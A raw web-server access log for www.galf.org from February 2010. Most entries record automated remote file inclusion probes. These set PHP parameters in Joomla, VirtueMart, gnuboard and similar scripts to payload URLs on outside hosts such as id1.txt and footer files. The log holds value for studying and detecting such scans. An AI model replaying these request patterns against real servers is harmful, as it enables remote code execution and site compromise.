208.80.193.38 - - [14/Feb/2010:21:10:26 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=37&ct=result HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; {832F9854-0612-4749-98B2-2EDA0CC990D1}; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.galf.org"
200.226.134.29 - - [14/Feb/2010:21:11:15 -0800] "GET /logs/access_091116.log%20%20/myevent.php?myevent_path=http://millo.niztyc.net/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.226.134.29 - - [14/Feb/2010:21:11:15 -0800] "GET /logs/myevent.php?myevent_path=http://millo.niztyc.net/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.226.134.29 - - [14/Feb/2010:21:11:15 -0800] "GET /myevent.php?myevent_path=http://millo.niztyc.net/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [14/Feb/2010:21:11:23 -0800] "GET /logs/access_100111.log%20%20//?_zb_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:21:12:13 -0800] "GET /bbs//delete_all.php?board_skin_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:21:12:13 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:21:12:13 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:21:12:20 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:21:12:20 -0800] "GET /bbs//delete_all.php?board_skin_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:21:12:20 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.139 - - [14/Feb/2010:21:12:40 -0800] "GET /logs/access_091019.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.226.134.29 - - [14/Feb/2010:21:12:57 -0800] "GET /logs/access_091116.log%20%20/myevent.php?myevent_path=http://millo.niztyc.net/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.226.134.29 - - [14/Feb/2010:21:12:57 -0800] "GET /logs/myevent.php?myevent_path=http://millo.niztyc.net/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.226.134.29 - - [14/Feb/2010:21:12:58 -0800] "GET /myevent.php?myevent_path=http://millo.niztyc.net/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.139 - - [14/Feb/2010:21:13:05 -0800] "GET /logs/access_090817.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:21:13:22 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:21:13:22 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:21:13:22 -0800] "GET /logs/access_091012.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:21:13:47 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:21:13:47 -0800] "GET /logs/access_091012.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:21:13:47 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:21:16:14 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:21:16:14 -0800] "GET /logs/access_091207.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:21:16:14 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [14/Feb/2010:21:16:21 -0800] "GET /logs/access_100201.log//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [14/Feb/2010:21:16:21 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [14/Feb/2010:21:16:21 -0800] "GET /delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.240.36.36 - - [14/Feb/2010:21:16:36 -0800] "GET /logs/access_100111.log//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:21:17:04 -0800] "GET /logs///accounts/inc/include.php?language=0&lang_settings[0][1]=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:21:17:04 -0800] "GET /logs/access_090713.log%20%20///accounts/inc/include.php?language=0&lang_settings[0][1]=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:21:17:04 -0800] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:21:17:30 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:21:17:32 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:21:17:32 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:21:17:43 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:21:17:43 -0800] "GET /logs/access_091012.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:21:17:43 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.243.44 - - [14/Feb/2010:21:20:11 -0800] "GET /logs/access_100118.log%20%20//?_zb_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.243.44 - - [14/Feb/2010:21:20:11 -0800] "GET /?_zb_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.44 - - [14/Feb/2010:21:20:11 -0800] "GET /logs//?_zb_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
200.226.134.29 - - [14/Feb/2010:21:20:19 -0800] "GET /myevent.php?myevent_path=http://millo.niztyc.net/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.226.134.29 - - [14/Feb/2010:21:20:19 -0800] "GET /logs/myevent.php?myevent_path=http://millo.niztyc.net/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.226.134.29 - - [14/Feb/2010:21:20:19 -0800] "GET /logs/access_091116.log%20%20/myevent.php?myevent_path=http://millo.niztyc.net/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:21:21:07 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:21:21:07 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:21:21:08 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:21:21:29 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:21:21:29 -0800] "GET /logs/access_100125.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:21:21:29 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.70.79.113 - - [14/Feb/2010:21:21:58 -0800] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.70.79.113 - - [14/Feb/2010:21:21:58 -0800] "GET /logs///accounts/inc/include.php?language=0&lang_settings[0][1]=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.70.79.113 - - [14/Feb/2010:21:21:58 -0800] "GET /logs/access_090713.log%20%20///accounts/inc/include.php?language=0&lang_settings[0][1]=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.6.218.57 - - [14/Feb/2010:21:21:59 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.6.218.57 - - [14/Feb/2010:21:21:59 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.6.218.57 - - [14/Feb/2010:21:21:59 -0800] "GET /logs/access_091221.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.243.44 - - [14/Feb/2010:21:22:14 -0800] "GET /logs/access_100111.log%20%20//?_zb_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:21:22:14 -0800] "GET /logs/access_100125.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:21:22:15 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:21:22:15 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:21:22:30 -0800] "GET /logs/access_091012.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:21:22:37 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:21:22:37 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:21:22:37 -0800] "GET /logs/access_091207.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.6.218.57 - - [14/Feb/2010:21:22:38 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.6.218.57 - - [14/Feb/2010:21:22:38 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.6.218.57 - - [14/Feb/2010:21:22:38 -0800] "GET /logs/access_091019.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:21:23:11 -0800] "GET /logs/access_090713.log%20%20///accounts/inc/include.php?language=0&lang_settings[0][1]=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:21:23:11 -0800] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:21:23:11 -0800] "GET /logs///accounts/inc/include.php?language=0&lang_settings[0][1]=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:21:23:28 -0800] "GET /logs/access_091012.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.124.149.168 - - [14/Feb/2010:21:23:55 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.124.149.168 - - [14/Feb/2010:21:23:55 -0800] "GET /logs/access_091019.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.124.149.168 - - [14/Feb/2010:21:23:55 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.6.218.57 - - [14/Feb/2010:21:26:06 -0800] "GET /logs/access_091019.log//modules/TotalCalendar/about.php?inc_dir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.28.110.99 - - [14/Feb/2010:21:26:06 -0800] "GET /logs/access_091019.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.28.110.99 - - [14/Feb/2010:21:26:06 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.28.110.99 - - [14/Feb/2010:21:26:06 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:21:30:06 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:21:30:06 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:21:30:06 -0800] "GET /logs/access_091207.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:21:30:43 -0800] "GET /logs//gnuboard4/bbs//delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.150.99.144 - - [14/Feb/2010:21:30:43 -0800] "GET /logs/access.log%20%20//gnuboard4/bbs//delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.150.99.144 - - [14/Feb/2010:21:30:43 -0800] "GET /gnuboard4/bbs//delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.150.99.144 - - [14/Feb/2010:21:30:57 -0800] "GET /logs//gnuboard4/bbs//delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.150.99.144 - - [14/Feb/2010:21:30:58 -0800] "GET /logs/access.log%20%20//gnuboard4/bbs//delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.150.99.144 - - [14/Feb/2010:21:30:58 -0800] "GET /gnuboard4/bbs//delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.34.19 - - [14/Feb/2010:21:31:35 -0800] "GET /logs//include/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.34.19 - - [14/Feb/2010:21:31:35 -0800] "GET /logs/access_100125.log//include/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.34.19 - - [14/Feb/2010:21:31:35 -0800] "GET /include/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.34.19 - - [14/Feb/2010:21:33:27 -0800] "GET /logs/access_091228.log//include/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.93.146.76 - - [14/Feb/2010:21:34:02 -0800] "GET /logs/access.log%20%20///index.php?option=com_sef&mosConfig.absolute.path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.93.146.76 - - [14/Feb/2010:21:34:02 -0800] "GET //index.php?option=com_sef&mosConfig.absolute.path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.93.146.76 - - [14/Feb/2010:21:34:02 -0800] "GET /logs///index.php?option=com_sef&mosConfig.absolute.path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.209 - - [14/Feb/2010:21:34:52 -0800] "GET /logs/head.php?path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.209 - - [14/Feb/2010:21:34:52 -0800] "GET /head.php?path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.209 - - [14/Feb/2010:21:34:53 -0800] "GET /logs/access_100125.log/head.php?path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.209 - - [14/Feb/2010:21:34:53 -0800] "GET /logs/head.php?path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.209 - - [14/Feb/2010:21:34:53 -0800] "GET /logs/access_100125.log/head.php?path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.209 - - [14/Feb/2010:21:34:53 -0800] "GET /head.php?path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [14/Feb/2010:21:35:19 -0800] "GET /logs/access_090720.log/?sourcedir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [14/Feb/2010:21:35:19 -0800] "GET /logs/?sourcedir=http://neokult.com/img/open.jpg??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [14/Feb/2010:21:35:22 -0800] "GET /?sourcedir=http://neokult.com/img/open.jpg??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:21:36:27 -0800] "GET /logs/access.log%20%20//gnuboard4/bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
210.205.6.233 - - [14/Feb/2010:21:36:27 -0800] "GET /gnuboard4/bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
210.205.6.233 - - [14/Feb/2010:21:36:27 -0800] "GET /logs//gnuboard4/bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
201.28.110.99 - - [14/Feb/2010:21:36:33 -0800] "GET /logs/access_091019.log//modules/TotalCalendar/about.php?inc_dir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.112.161 - - [14/Feb/2010:21:38:07 -0800] "GET /logs/ HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
222.239.227.209 - - [14/Feb/2010:21:39:22 -0800] "GET /logs/access_100125.log/head.php?path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.209 - - [14/Feb/2010:21:39:22 -0800] "GET /logs/head.php?path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.209 - - [14/Feb/2010:21:39:22 -0800] "GET /head.php?path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.209 - - [14/Feb/2010:21:39:47 -0800] "GET /logs/access_100125.log/head.php?path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.209 - - [14/Feb/2010:21:39:47 -0800] "GET /head.php?path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.209 - - [14/Feb/2010:21:39:47 -0800] "GET /logs/head.php?path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:21:40:08 -0800] "GET /logs/access.log%20%20//bbs//delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:21:40:08 -0800] "GET /logs//bbs//delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:21:40:08 -0800] "GET /bbs//delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:21:40:34 -0800] "GET /logs/access.log%20%20//bbs//delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.112.161 - - [14/Feb/2010:21:41:43 -0800] "GET /logs/access_100215.log HTTP/1.0" 200 8554295 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
151.8.79.19 - - [14/Feb/2010:21:42:01 -0800] "GET /?sourcedir=http://neokult.com/img/open.jpg??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [14/Feb/2010:21:42:01 -0800] "GET /logs/?sourcedir=http://neokult.com/img/open.jpg??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
67.195.112.161 - - [14/Feb/2010:21:42:04 -0800] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
210.205.6.233 - - [14/Feb/2010:21:43:15 -0800] "GET /logs//gnuboard4/bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
210.205.6.233 - - [14/Feb/2010:21:43:15 -0800] "GET /gnuboard4/bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
210.205.6.233 - - [14/Feb/2010:21:43:15 -0800] "GET /logs/access.log%20%20//gnuboard4/bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
210.205.6.233 - - [14/Feb/2010:21:44:37 -0800] "GET /gnuboard4/bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
210.205.6.233 - - [14/Feb/2010:21:44:37 -0800] "GET /logs//gnuboard4/bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
